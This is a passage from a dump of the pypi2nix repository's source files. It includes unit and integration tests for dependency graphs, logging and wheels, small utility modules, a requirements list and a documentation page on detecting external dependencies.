RequirementParser\n ):\n self.assertTrue(\n dependency_graph.is_runtime_dependency(\n requirement_parser.parse(\"django\"), requirement_parser.parse(\"pytz\"),\n )\n )\n\n\nclass DependencyGraphInputTestCase(IntegrationTest):\n \"\"\"This class checks behavior if the user supplies a dependency graph\n when running pypi2nix.\n\n Normally requests should not come with django. In this test case\n we tell pypi2nix that requests is a dependecy of django. After\n running pypi2nix nix we check if requests was also installed.\n \"\"\"\n\n name_of_testcase = \"dependency_graph_input\"\n requirements = [\"django == 3.0.5\"]\n dependency_graph = {\"django\": {\"runtimeDependencies\": [\"requests\"]}}\n code_for_testing = [\"import requests\"]\n" }, { "alpha_fraction": 0.5759539008140564, "alphanum_fraction": 0.5759539008140564, "avg_line_length": 26.235294342041016, "blob_id": "728476759ee251090b19ed3c3f93fd68c4fd49b5", "content_id": "283889102178f548a76d25ae13812070d18d694a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1389, "license_type": "no_license", "max_line_length": 69, "num_lines": 51, "path": "/src/pypi2nix/path.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from __future__ import annotations\n\nimport os\nimport os.path\nimport pathlib\nfrom typing import List\nfrom typing import Union\n\n\nclass Path:\n def __init__(self, path: Union[pathlib.Path, str, Path]) -> None:\n self._path: pathlib.Path\n if isinstance(path, str):\n self._path = pathlib.Path(path)\n elif isinstance(path, pathlib.Path):\n self._path = path\n else:\n self._path = path._path\n\n def list_files(self) -> List[Path]:\n return list(map(lambda f: self / f, os.listdir(str(self))))\n\n def ensure_directory(self) -> None:\n return os.makedirs(self._path, exist_ok=True)\n\n def write_text(self, text: str) -> None:\n self._path.write_text(text)\n\n def endswith(self, suffix: str) -> bool:\n return str(self).endswith(suffix)\n\n def is_file(self) -> bool:\n return os.path.isfile(self._path)\n\n def __truediv__(self, other: Union[str, Path]) -> Path:\n if isinstance(other, str):\n return Path(self._path / other)\n else:\n return Path(self._path / other._path)\n\n def __str__(self) -> str:\n return str(self._path)\n\n def __hash__(self) -> int:\n return hash(self._path)\n\n def __eq__(self, other: object) -> bool:\n if isinstance(other, Path):\n return self._path == other._path\n else:\n return False\n" }, { "alpha_fraction": 0.7369624972343445, "alphanum_fraction": 0.7419945001602173, "avg_line_length": 28.14666748046875, "blob_id": "c807afda7f8d1f1e2240bb61aac265f129c50181", "content_id": "fc3a19466f9a230d320377601db5f24353e34b51", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2186, "license_type": "permissive", "max_line_length": 87, "num_lines": 75, "path": "/unittests/test_wheel.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import json\n\nimport pytest\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\nfrom pypi2nix.wheel import Wheel\n\nfrom .switches import nix\n\n\n@pytest.fixture\ndef wheel(current_platform):\n build_dependencies = RequirementSet(current_platform)\n dependencies = RequirementSet(current_platform)\n return Wheel(\n name=\"test-wheel\",\n version=\"1.0\",\n deps=dependencies,\n homepage=\"https://example.test\",\n license=\"\",\n description=\"description\",\n build_dependencies=build_dependencies,\n target_platform=current_platform,\n )\n\n\n@nix\ndef test_can_create_wheel_from_valid_directory(\n extracted_six_package,\n current_platform,\n logger: Logger,\n requirement_parser: RequirementParser,\n):\n Wheel.from_wheel_directory_path(\n extracted_six_package, current_platform, logger, requirement_parser\n )\n\n\n@nix\ndef test_can_add_build_dependencies_to_wheel(\n wheel: Wheel,\n current_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n):\n build_dependencies = RequirementSet(current_platform)\n build_dependencies.add(requirement_parser.parse(\"dep1\"))\n build_dependencies.add(requirement_parser.parse(\"dep2\"))\n wheel.add_build_dependencies(build_dependencies)\n assert \"dep1\" in wheel.build_dependencies(current_platform)\n assert \"dep2\" in wheel.build_dependencies(current_platform)\n\n\ndef test_that_to_dict_is_json_serializable(wheel: Wheel):\n json.dumps(wheel.to_dict())\n\n\ndef test_that_setupcfg_package_wheel_contains_requests_as_dependency(\n setupcfg_package_wheel: Wheel,\n):\n assert \"requests\" in setupcfg_package_wheel.dependencies()\n\n\ndef test_that_setupcfg_package_wheel_contains_pytest_as_testing_dependency(\n setupcfg_package_wheel: Wheel,\n):\n assert \"pytest\" in setupcfg_package_wheel.dependencies(extras=[\"testing\"])\n\n\ndef test_that_setupcfg_package_wheel_does_not_contain_pytest_as_non_testing_dependency(\n setupcfg_package_wheel: Wheel,\n):\n assert \"pytest\" not in setupcfg_package_wheel.dependencies()\n" }, { "alpha_fraction": 0.7928388714790344, "alphanum_fraction": 0.7962489128112793, "avg_line_length": 40.89285659790039, "blob_id": "510556d329cf81b3e30bd69420c6c46441fb80ab", "content_id": "1ef8e2d0d8301b8d5ba28f0297483885544936e9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1173, "license_type": "permissive", "max_line_length": 84, "num_lines": 28, "path": "/unittests/test_requirement_dependency_retriever.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.external_dependencies import ExternalDependency\nfrom pypi2nix.external_dependency_collector import RequirementDependencyRetriever\nfrom pypi2nix.requirement_parser import RequirementParser\n\n\ndef test_no_external_dependency_for_empty_dependency_graph(\n requirement_parser: RequirementParser,\n) -> None:\n dependency_graph = DependencyGraph()\n retriever = RequirementDependencyRetriever(dependency_graph)\n requirement = requirement_parser.parse(\"testpackage\")\n assert not retriever.get_external_dependency_for_requirement(requirement)\n\n\ndef test_external_dependencies_from_graph_are_retrieved(\n requirement_parser: RequirementParser,\n) -> None:\n dependency_graph = DependencyGraph()\n requirement = requirement_parser.parse(\"testpackage\")\n external_dependency = ExternalDependency(\"external\")\n dependency_graph.set_external_dependency(\n dependent=requirement, dependency=external_dependency\n )\n retriever = RequirementDependencyRetriever(dependency_graph)\n assert external_dependency in retriever.get_external_dependency_for_requirement(\n requirement\n )\n" }, { "alpha_fraction": 0.7128921151161194, "alphanum_fraction": 0.7190130352973938, "avg_line_length": 26.515789031982422, "blob_id": "15956ce2e741bb73c351b0bce30497b9ae8b3223", "content_id": "015489f780861672755e42fd18f7d7a12f632b50", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5228, "license_type": "permissive", "max_line_length": 87, "num_lines": 190, "path": "/unittests/test_logger.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from io import StringIO\n\nimport pytest\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.logger import LoggerNotConnected\nfrom pypi2nix.logger import ProxyLogger\nfrom pypi2nix.logger import StreamLogger\nfrom pypi2nix.logger import Verbosity\nfrom pypi2nix.logger import verbosity_from_int\n\nfrom .logger import get_logger_output\n\n\n@pytest.fixture(params=[\"proxy\", \"stream\"])\ndef logger(request):\n stream = StringIO(\"\")\n stream_logger = StreamLogger(output=stream)\n if request.param == \"stream\":\n return stream_logger\n elif request.param == \"proxy\":\n proxy_logger = ProxyLogger()\n proxy_logger.set_target_logger(stream_logger)\n return proxy_logger\n\n\n@pytest.fixture\ndef unconnected_proxy_logger():\n return ProxyLogger()\n\n\ndef test_can_log_warning(logger: Logger):\n logger.warning(\"test\")\n\n assert \"WARNING: test\" in get_logger_output(logger)\n\n\ndef test_every_line_of_warning_is_prefixed(logger):\n logger.warning(\"line1\\nline2\")\n\n output = get_logger_output(logger)\n assert \"WARNING: line1\" in output\n assert \"WARNING: line2\" in output\n\n\n@pytest.mark.parametrize(\"level\", (Verbosity.ERROR,))\ndef test_that_logger_with_low_verbosity_level_does_not_emit_warning_logs(\n logger: Logger, level\n):\n logger.set_verbosity(level)\n logger.warning(\"test\")\n\n output = get_logger_output(logger)\n assert \"WARNING\" not in output\n\n\n@pytest.mark.parametrize(\"level\", (Verbosity.WARNING, Verbosity.INFO, Verbosity.DEBUG))\ndef test_that_logger_with_high_verbosity_level_does_emit_warning_logs(\n logger: Logger, level: Verbosity\n):\n logger.set_verbosity(level)\n logger.warning(\"test\")\n\n output = get_logger_output(logger)\n assert \"WARNING\" in output\n\n\ndef test_can_log_error(logger: Logger):\n logger.error(\"test\")\n\n assert \"ERROR: test\" in get_logger_output(logger)\n\n\ndef test_every_line_of_error_is_prefixed(logger: Logger):\n logger.error(\"line1\\nline2\")\n\n output = get_logger_output(logger)\n assert \"ERROR: line1\" in output\n assert \"ERROR: line2\" in output\n\n\n@pytest.mark.parametrize(\n \"level\", (Verbosity.ERROR, Verbosity.WARNING, Verbosity.INFO, Verbosity.DEBUG)\n)\ndef test_that_logger_always_emits_errors(logger: Logger, level: Verbosity):\n logger.set_verbosity(level)\n logger.error(\"test\")\n\n output = get_logger_output(logger)\n assert \"ERROR\" in output\n\n\ndef test_can_log_info(logger: Logger):\n logger.info(\"test\")\n\n assert \"INFO: test\" in get_logger_output(logger)\n\n\ndef test_every_info_line_is_prefixed(logger: Logger):\n logger.info(\"line1\\nline2\")\n\n output = get_logger_output(logger)\n assert \"INFO: line1\" in output\n assert \"INFO: line2\" in output\n\n\n@pytest.mark.parametrize(\"level\", (Verbosity.WARNING, Verbosity.ERROR))\ndef test_that_logger_with_low_verbosity_level_does_not_emit_info_logs(\n logger: Logger, level\n):\n logger.set_verbosity(level)\n logger.info(\"test\")\n\n output = get_logger_output(logger)\n assert \"INFO\" not in output\n\n\n@pytest.mark.parametrize(\"level\", (Verbosity.INFO, Verbosity.DEBUG))\ndef test_that_logger_with_high_verbosity_level_does_emit_info_logs(\n logger: Logger, level: Verbosity\n):\n logger.set_verbosity(level)\n logger.info(\"test\")\n\n output = get_logger_output(logger)\n assert \"INFO\" in output\n\n\ndef test_can_log_debug(logger: Logger):\n logger.debug(\"test\")\n\n assert \"DEBUG: test\" in get_logger_output(logger)\n\n\ndef test_every_debug_line_is_prefixed(logger: Logger):\n logger.debug(\"line1\\nline2\")\n\n output = get_logger_output(logger)\n assert \"DEBUG: line1\" in output\n assert \"DEBUG: line2\" in output\n\n\n@pytest.mark.parametrize(\"level\", (Verbosity.WARNING, Verbosity.ERROR, Verbosity.INFO))\ndef test_that_logger_with_low_verbosity_level_does_not_emit_debug_logs(\n logger: Logger, level\n):\n logger.set_verbosity(level)\n logger.debug(\"test\")\n\n output = get_logger_output(logger)\n assert \"DEBUG\" not in output\n\n\n@pytest.mark.parametrize(\"level\", (Verbosity.DEBUG,))\ndef test_that_logger_with_high_verbosity_level_does_emit_debug_logs(\n logger: Logger, level: Verbosity\n):\n logger.set_verbosity(level)\n logger.debug(\"test\")\n\n output = get_logger_output(logger)\n assert \"DEBUG\" in output\n\n\n@pytest.mark.parametrize(\"level\", list(Verbosity))\ndef test_that_verbosity_level_can_be_retrieved_from_assigned_integer(level):\n assert verbosity_from_int(level.value) == level\n\n\ndef test_that_high_number_gets_translated_into_debug_verbosity():\n assert verbosity_from_int(10000) == Verbosity.DEBUG\n\n\ndef test_that_low_number_gets_translated_into_error_verbosity():\n assert verbosity_from_int(-10000) == Verbosity.ERROR\n\n\ndef test_that_unconnect_proxy_logger_raises_proper_exception_on_logging(\n unconnected_proxy_logger,\n):\n with pytest.raises(LoggerNotConnected):\n unconnected_proxy_logger.debug(\"test\")\n with pytest.raises(LoggerNotConnected):\n unconnected_proxy_logger.info(\"test\")\n with pytest.raises(LoggerNotConnected):\n unconnected_proxy_logger.warning(\"test\")\n with pytest.raises(LoggerNotConnected):\n unconnected_proxy_logger.error(\"test\")\n with pytest.raises(LoggerNotConnected):\n unconnected_proxy_logger.set_verbosity(Verbosity.DEBUG)\n" }, { "alpha_fraction": 0.6652719378471375, "alphanum_fraction": 0.6903765797615051, "avg_line_length": 28.875, "blob_id": "a41dacbacfbca8045a48e48b1c9a401fe3001cab", "content_id": "3c403230b7fa08c1a1e313157246cc49bd789e49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 239, "license_type": "no_license", "max_line_length": 50, "num_lines": 8, "path": "/integrationtests/test_fava.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass FavaTestCase(IntegrationTest):\n name_of_testcase = \"fava\"\n requirements = [\"fava==1.13\"]\n external_dependencies = [\"libxml2\", \"libxslt\"]\n constraints = [\"jaraco-functools == 2.0\"]\n" }, { "alpha_fraction": 0.7352429628372192, "alphanum_fraction": 0.7362659573554993, "avg_line_length": 33.91071319580078, "blob_id": "770bfad63d14751c7d9588642a28e386737457de", "content_id": "51c2f08670547fb420c31ae1dd80f04d140e9b13", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9775, "license_type": "permissive", "max_line_length": 88, "num_lines": 280, "path": "/unittests/test_dependency_graph.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from copy import copy\n\nimport pytest\n\nfrom pypi2nix.dependency_graph import CyclicDependencyOccured\nfrom pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.external_dependencies import ExternalDependency\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.requirements import Requirement\nfrom pypi2nix.requirements import VersionRequirement\nfrom pypi2nix.target_platform import TargetPlatform\nfrom pypi2nix.wheel import Wheel\n\n\ndef test_can_set_runtime_dependencies(\n package_a: Requirement, package_b: Requirement, dependency_graph: DependencyGraph\n):\n dependency_graph.set_runtime_dependency(dependent=package_a, dependency=package_b)\n assert dependency_graph.is_runtime_dependency(\n dependent=package_a, dependency=package_b\n )\n\n\ndef test_can_detect_indirect_runtime_dependencies(\n package_a: Requirement,\n package_b: Requirement,\n package_c: Requirement,\n dependency_graph: DependencyGraph,\n) -> None:\n dependency_graph.set_runtime_dependency(dependent=package_a, dependency=package_b)\n dependency_graph.set_runtime_dependency(dependent=package_b, dependency=package_c)\n assert dependency_graph.is_runtime_dependency(\n dependent=package_a, dependency=package_c\n )\n\n\ndef test_cyclic_runtime_dependencies_not_allowed(\n package_a: Requirement, package_b: Requirement, dependency_graph: DependencyGraph\n):\n dependency_graph.set_runtime_dependency(dependent=package_a, dependency=package_b)\n with pytest.raises(CyclicDependencyOccured):\n dependency_graph.set_runtime_dependency(\n dependent=package_b, dependency=package_a\n )\n\n\ndef test_can_retriev_all_runtime_dependency_names(\n package_a: Requirement,\n package_b: Requirement,\n package_c: Requirement,\n dependency_graph: DependencyGraph,\n) -> None:\n dependency_graph.set_runtime_dependency(dependent=package_a, dependency=package_b)\n dependency_graph.set_runtime_dependency(dependent=package_b, dependency=package_c)\n assert dependency_graph.get_all_runtime_dependency_names(package_a) == {\n package_a.name(),\n package_b.name(),\n package_c.name(),\n }\n\n\ndef test_can_set_buildtime_dependency(\n package_a: Requirement, package_b: Requirement, dependency_graph: DependencyGraph\n):\n dependency_graph.set_buildtime_dependency(dependent=package_a, dependency=package_b)\n assert dependency_graph.is_buildtime_dependency(\n dependent=package_a, dependency=package_b\n )\n\n\ndef test_build_time_dependencies_dont_show_up_as_runtime_dependencies(\n package_a: Requirement,\n package_b: Requirement,\n package_c: Requirement,\n dependency_graph: DependencyGraph,\n):\n dependency_graph.set_runtime_dependency(dependent=package_a, dependency=package_b)\n dependency_graph.set_buildtime_dependency(dependent=package_b, dependency=package_c)\n assert not dependency_graph.is_runtime_dependency(\n dependent=package_a, dependency=package_c\n )\n\n\ndef test_cannot_add_circular_buildtime_dependencies(\n package_a: Requirement, package_b: Requirement, dependency_graph: DependencyGraph,\n):\n dependency_graph.set_buildtime_dependency(dependent=package_a, dependency=package_b)\n with pytest.raises(CyclicDependencyOccured):\n dependency_graph.set_buildtime_dependency(\n dependent=package_b, dependency=package_a\n )\n\n\ndef test_cannot_add_circular_builtime_dependency_to_runtime_dependency(\n package_a: Requirement, package_b: Requirement, dependency_graph: DependencyGraph,\n):\n dependency_graph.set_runtime_dependency(dependent=package_a, dependency=package_b)\n with pytest.raises(CyclicDependencyOccured):\n dependency_graph.set_buildtime_dependency(\n dependent=package_b, dependency=package_a\n )\n\n\ndef test_cannot_add_circular_runtime_dependency_to_buildtime_dependency(\n package_a: Requirement, package_b: Requirement, dependency_graph: DependencyGraph,\n):\n dependency_graph.set_buildtime_dependency(dependent=package_a, dependency=package_b)\n with pytest.raises(CyclicDependencyOccured):\n dependency_graph.set_runtime_dependency(\n dependent=package_b, dependency=package_a\n )\n\n\ndef test_can_add_two_dependencies_graphs_and_runtime_dependencies_are_also_added(\n package_a: Requirement,\n package_b: Requirement,\n package_c: Requirement,\n dependency_graph: DependencyGraph,\n):\n other_dependency_graph = copy(dependency_graph)\n dependency_graph.set_runtime_dependency(dependent=package_a, dependency=package_b)\n other_dependency_graph.set_runtime_dependency(\n dependent=package_b, dependency=package_c\n )\n sum_graph = dependency_graph + other_dependency_graph\n assert not dependency_graph.is_runtime_dependency(\n dependent=package_a, dependency=package_c\n )\n assert not other_dependency_graph.is_runtime_dependency(\n dependent=package_a, dependency=package_c\n )\n assert sum_graph.is_runtime_dependency(dependent=package_a, dependency=package_c)\n\n\ndef test_can_add_two_dependencies_graphs_and_buildtime_dependencies_are_also_added(\n package_a: Requirement,\n package_b: Requirement,\n package_c: Requirement,\n dependency_graph: DependencyGraph,\n):\n other_dependency_graph = copy(dependency_graph)\n dependency_graph.set_buildtime_dependency(dependent=package_a, dependency=package_b)\n other_dependency_graph.set_buildtime_dependency(\n dependent=package_b, dependency=package_c\n )\n sum_graph = dependency_graph + other_dependency_graph\n assert not dependency_graph.is_buildtime_dependency(\n dependent=package_a, dependency=package_c\n )\n assert not other_dependency_graph.is_buildtime_dependency(\n dependent=package_a, dependency=package_c\n )\n assert sum_graph.is_buildtime_dependency(dependent=package_a, dependency=package_c)\n\n\ndef test_can_detect_external_dependencies_for_packages(\n package_a: Requirement,\n external_dependency_a: ExternalDependency,\n dependency_graph: DependencyGraph,\n):\n dependency_graph.set_external_dependency(\n dependent=package_a, dependency=external_dependency_a\n )\n assert dependency_graph.get_all_external_dependencies(package_a) == {\n external_dependency_a,\n }\n\n\ndef test_can_retrieve_external_dependencies_from_runtime_dependencies(\n package_a: Requirement,\n package_b: Requirement,\n external_dependency_a: ExternalDependency,\n dependency_graph: DependencyGraph,\n):\n dependency_graph.set_runtime_dependency(dependent=package_a, dependency=package_b)\n dependency_graph.set_external_dependency(\n dependent=package_b, dependency=external_dependency_a\n )\n assert dependency_graph.get_all_external_dependencies(package=package_a) == {\n external_dependency_a,\n }\n\n\ndef test_can_retrieve_external_dependencies_after_adding_graphs(\n package_a: Requirement,\n package_b: Requirement,\n external_dependency_a: ExternalDependency,\n external_dependency_b: ExternalDependency,\n dependency_graph: DependencyGraph,\n):\n other_dependency_graph = copy(dependency_graph)\n dependency_graph.set_external_dependency(\n dependent=package_a, dependency=external_dependency_a\n )\n dependency_graph.set_runtime_dependency(dependent=package_a, dependency=package_b)\n other_dependency_graph.set_external_dependency(\n dependent=package_b, dependency=external_dependency_b\n )\n sum_graph = dependency_graph + other_dependency_graph\n assert sum_graph.get_all_external_dependencies(package=package_a) == {\n external_dependency_a,\n external_dependency_b,\n }\n\n\ndef test_can_understand_wheel_dependecies(\n current_platform: TargetPlatform, requirement_parser: RequirementParser\n):\n runtime_dependencies = RequirementSet(current_platform)\n runtime_dependency = requirement_parser.parse(\"runtime_dependency\")\n runtime_dependencies.add(runtime_dependency)\n build_dependencies = RequirementSet(current_platform)\n build_dependency = requirement_parser.parse(\"build_dependency\")\n build_dependencies.add(build_dependency)\n wheel = Wheel(\n name=\"testpackage\",\n version=\"\",\n deps=runtime_dependencies,\n target_platform=current_platform,\n license=\"\",\n homepage=\"\",\n description=\"\",\n build_dependencies=build_dependencies,\n )\n requirement = requirement_parser.parse(\"testpackage\")\n dependency_graph = DependencyGraph()\n dependency_graph.import_wheel(wheel, requirement_parser)\n\n assert dependency_graph.is_buildtime_dependency(requirement, build_dependency)\n assert dependency_graph.is_runtime_dependency(requirement, runtime_dependency)\n\n\n@pytest.fixture\ndef package_a(logger: Logger) -> Requirement:\n return VersionRequirement(\n name=\"package-a\",\n versions=[],\n extras=set(),\n environment_markers=None,\n logger=logger,\n )\n\n\n@pytest.fixture\ndef package_b(logger: Logger) -> Requirement:\n return VersionRequirement(\n name=\"package-b\",\n versions=[],\n extras=set(),\n environment_markers=None,\n logger=logger,\n )\n\n\n@pytest.fixture\ndef package_c(logger: Logger) -> Requirement:\n return VersionRequirement(\n name=\"package-c\",\n versions=[],\n extras=set(),\n environment_markers=None,\n logger=logger,\n )\n\n\n@pytest.fixture\ndef dependency_graph() -> DependencyGraph:\n return DependencyGraph()\n\n\n@pytest.fixture\ndef external_dependency_a() -> ExternalDependency:\n return ExternalDependency(\"a\")\n\n\n@pytest.fixture\ndef external_dependency_b() -> ExternalDependency:\n return ExternalDependency(\"b\")\n" }, { "alpha_fraction": 0.7094017267227173, "alphanum_fraction": 0.7094017267227173, "avg_line_length": 22.399999618530273, "blob_id": "24aa81c94fdf5f2b641c5f9defa77b09ef2042c5", "content_id": "c6475fa0f4cbd1913c12a348808e10fc4087baf8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 117, "license_type": "no_license", "max_line_length": 53, "num_lines": 5, "path": "/mypy/jsonschema.pyi", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Any\n\ndef validate(instance: Any, schema: Any) -> None: ...\n\nclass ValidationError(Exception): ...\n" }, { "alpha_fraction": 0.7803871035575867, "alphanum_fraction": 0.7855483889579773, "avg_line_length": 44.05813980102539, "blob_id": "85d51dbb4e7e2a96c48ae6a8d4a3597c550c9793", "content_id": "1ff0396a82cf0309688f664722d9572e8925414b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3876, "license_type": "no_license", "max_line_length": 77, "num_lines": 86, "path": "/source/external-dependencies.rst", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "External Dependencies\n=====================\n\nThis chapter is based on a `PR for pypi2nix`_. Got there if you want\nto learn about the intial implementation of external dependency\ndetection.\n\nGoal\n----\n\nThe goal is to have a system that helps the user to deal with external\ndependencies. Currently the user has to know by heart (or trial and\nerror) that e.g. \\ ``lxml`` needs ``libxml2`` and ``libxslt``. We want\nto automate that for the user, at least for the most common packages.\n\nThe idea is to have a system that you pass your initial requirements and\nas a result you get a list of the necessary external dependencies. This\nwill have synergy with implementing automatic setup requirement\ndetection.\n\nMechanism\n---------\n\nEvery ``pypi2nix`` invocation has with it associated a set of\nrequirements. This is usually the set of requirements that the user has\nfor their project. To find out what kind of external dependencies are\nnecessary to build the requested packages we need to solve two problems:\n\n1) Find out all the dependencies of the specified/requested packages\n from the user without building them.\n2) For all of these dependencies find out if and what external\n dependencies are required without building all the packages.\n\nWe have to know all required external dependencies in advance since\nrestarting the whole build just because a dependency was detected us\nunacceptable. For some users with slower or older hardware even one\nsingle build might take more than 10 minutes for larger package sets. If\nthe build for restart several times it would render ``pypi2nix``\nunusable to those users.\n\nThat means that we have to have a place where dependency information can\nbe collected and used by pypi2nix. The information about the\ndependencies is basically a directed acyclic graph since this\nimplementation will not support circular dependencies (for now).\n\nFor collecting information about external dependencies we will rely on\nusers reporting such external dependencies for know. Developing a tool\nto detect external dependencies from build output is out of scope of\nthis PR.\n\nThe dependency graph for python dependencies can be generated by\n``pypi2nix`` automatically. This PR will include a mechanism to\ngenerated dependency graphs in the right data format for ingestion by\n``pypi2nix``.\n\nInfrastructure\n--------------\n\nWe need way to distribute a dependency tree to users. This will make the\ndetection mechanism much more useful since it frees users from\nmaintaining fresh set of dependencies. We want to implement a similar\nmechanism as with\n`pypi2nix-overrides <https://github.com/nix-community/pypi2nix-overrides>`__.\nThis means that we a have a semi-central git repository that contains\nall the detected dependencies. Since git is content addressable we can\nensure reproducible builds. Our security model with that approach is\n**Trust on First Use**.\n\nData format\n-----------\n\nIn order to minimize necessary labor we have to automate the generation\nof dependencies as much as possible. This means that we need to have\ndata format that allows seamless merging of generated and curated\ndependency trees. Also we should use a data format that is easy to edit\nby humans and machines alike. A suitable candidate would be the `yaml\nformat <https://yaml.org/>`__. This would allow us to provide `json\nschemas <https://json-schema.org/>`__ for the data format to allow for\neffective reuse of the data. A concern might be that the volume of the\ndata makes a compact data file to large to download. If in the future we\nrun into traffic or performance problems we might consider implementing\na web API. Already using `json schemas <https://json-schema.org/>`__\nwould make that transition easy as we could leverage OpenAPI 3.0 to make\nthe data format and the API accessible to many people.\n\n.. _`PR for pypi2nix`: https://github.com/nix-community/pypi2nix/pull/426\n" }, { "alpha_fraction": 0.6195651888847351, "alphanum_fraction": 0.6195651888847351, "avg_line_length": 22, "blob_id": "0641eea24bf5fe9c8a62c1c69abadc842d743864", "content_id": "584ab6febd32ec9e581db8065e95db5c06c9ae20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 276, "license_type": "no_license", "max_line_length": 50, "num_lines": 12, "path": "/scripts/repository.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from pathlib import Path\n\n\ndef find_root(start: Path = Path(\".\")) -> Path:\n absolute_location = start.resolve()\n if (absolute_location / \".git\").is_dir():\n return absolute_location\n else:\n return find_root(absolute_location / \"..\")\n\n\nROOT = find_root()\n" }, { "alpha_fraction": 0.7745974659919739, "alphanum_fraction": 0.7799642086029053, "avg_line_length": 36.266666412353516, "blob_id": "b9a8ba740e179907a0d6aa7d78b2e8b2b9d2d03e", "content_id": "8aea4fea4a06aa6c4acac1617d7a2b96ed3e6997", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 559, "license_type": "no_license", "max_line_length": 80, "num_lines": 15, "path": "/src/pypi2nix/external_dependency_collector/lookup.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Set\n\nfrom pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.external_dependencies import ExternalDependency\nfrom pypi2nix.requirements import Requirement\n\n\nclass RequirementDependencyRetriever:\n def __init__(self, dependency_graph: DependencyGraph = DependencyGraph()):\n self._dependency_graph = dependency_graph\n\n def get_external_dependency_for_requirement(\n self, requirement: Requirement\n ) -> Set[ExternalDependency]:\n return self._dependency_graph.get_all_external_dependencies(requirement)\n" }, { "alpha_fraction": 0.7148148417472839, "alphanum_fraction": 0.720370352268219, "avg_line_length": 35, "blob_id": "24fbef979b6f3fcb8977e88191d4931fd82e778d", "content_id": "70896344256d2228ad076587b59cd412585621a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 540, "license_type": "no_license", "max_line_length": 82, "num_lines": 15, "path": "/integrationtests/test_appdirs.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass AppDirsTestCase(IntegrationTest):\n \"\"\"This test checks if we handle quote characters '\"' in package descriptions.\n\n The appdirs package has a description that includes a '\"'. This\n description gets rendered into the \"meta\" attribute of the result\n nix derivation. We evaluate this attribute to make sure that\n everything is escaped fine.\n \"\"\"\n\n name_of_testcase = \"appdirs\"\n requirements = [\"appdirs==1.4.3\"]\n additional_paths_to_build = [\"packages.appdirs.meta\"]\n" }, { "alpha_fraction": 0.6954023241996765, "alphanum_fraction": 0.7011494040489197, "avg_line_length": 28, "blob_id": "14af294e6fe9189428fdd2a3d9438758eaf5c2fb", "content_id": "1944b383f30c275a9778928a5d57d1d68c7ba19c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 174, "license_type": "no_license", "max_line_length": 44, "num_lines": 6, "path": "/src/pypi2nix/version.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os.path\n\nHERE = os.path.dirname(__file__)\nVERSION_FILE = os.path.join(HERE, \"VERSION\")\nwith open(VERSION_FILE) as handle:\n pypi2nix_version = handle.read().strip()\n" }, { "alpha_fraction": 0.837837815284729, "alphanum_fraction": 0.8468468189239502, "avg_line_length": 8.25, "blob_id": "c9790f29a008a5f129febcb65e66f5f0f461371b", "content_id": "03a061cebecb1f5cc1e6c6dc6442d413a7a4e87e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 111, "license_type": "no_license", "max_line_length": 19, "num_lines": 12, "path": "/requirements.txt", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "attrs\nclick\njinja2\nnix-prefetch-github\nparsley\ntoml\npackaging\njsonschema\nhypothesis\npyyaml\n\n-c constraints.txt\n" }, { "alpha_fraction": 0.6496350169181824, "alphanum_fraction": 0.6569343209266663, "avg_line_length": 34.739131927490234, "blob_id": "a47726258a873bf1f89448bd3a76d7e48db5d424", "content_id": "90dd47ec383f9f7271d7569b3d8f7aa69b076323", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 822, "license_type": "permissive", "max_line_length": 82, "num_lines": 23, "path": "/unittests/logger.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from pypi2nix.logger import Logger\nfrom pypi2nix.logger import ProxyLogger\nfrom pypi2nix.logger import StreamLogger\n\n\ndef get_logger_output(logger: Logger) -> str:\n def get_inner_logger(logger: Logger) -> StreamLogger:\n if isinstance(logger, StreamLogger):\n return logger\n elif isinstance(logger, ProxyLogger):\n inner_logger = logger.get_target_logger()\n if inner_logger is None:\n raise Exception(\"ProxyLogger 